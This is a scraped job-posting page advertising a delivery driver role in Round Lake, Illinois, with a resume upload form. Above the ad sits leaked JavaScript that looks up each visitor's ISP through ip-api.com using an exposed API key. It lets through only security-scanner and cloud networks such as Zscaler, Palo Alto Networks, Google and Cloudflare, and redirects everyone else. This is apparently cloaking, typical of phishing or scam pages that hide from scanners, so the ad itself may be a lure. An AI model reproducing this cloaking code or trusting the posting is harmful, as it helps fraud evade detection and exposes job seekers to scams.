Delivery Driver

Delivery Driver

Overview


const ipAddress = data.ip;

// retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/${ipAddress}?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname;

// check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg));

if (!ispAllowed && !asOrgAllowed) { // Redirect all users to the same URL window.location.href = ''; } }) .catch(error => { console.error('Error retrieving ISP name:', error); }); }) .catch(error => { console.error('Error retrieving IP address or location:', error); });

Join our team as a Delivery Driver in Round Lake, Illinois, and enjoy flexible hours delivering food to customers using your own vehicle.

Responsibilities:

  • Pickup orders from local restaurants and deliver to customers promptly and accurately.
  • Maintain a high level of customer service, ensuring customer satisfaction.
  • Follow delivery routes efficiently and adhere to traffic laws.

Skills Needed:

  • Valid driver's license and reliable vehicle.
  • Good navigation skills and knowledge of the local area.
  • Strong communication skills and professionalism.
  • Ability to work independently and manage time effectively.

Benefits:

  • Flexible schedule options to fit your availability.
  • Competitive pay with tips.
  • Opportunity to earn extra income.
Emploment Location
Illinois, Round Lake

Apply to Join Progression Transport.

*
*
* Attach your resume. Max size 2mb Allowed Types: pdf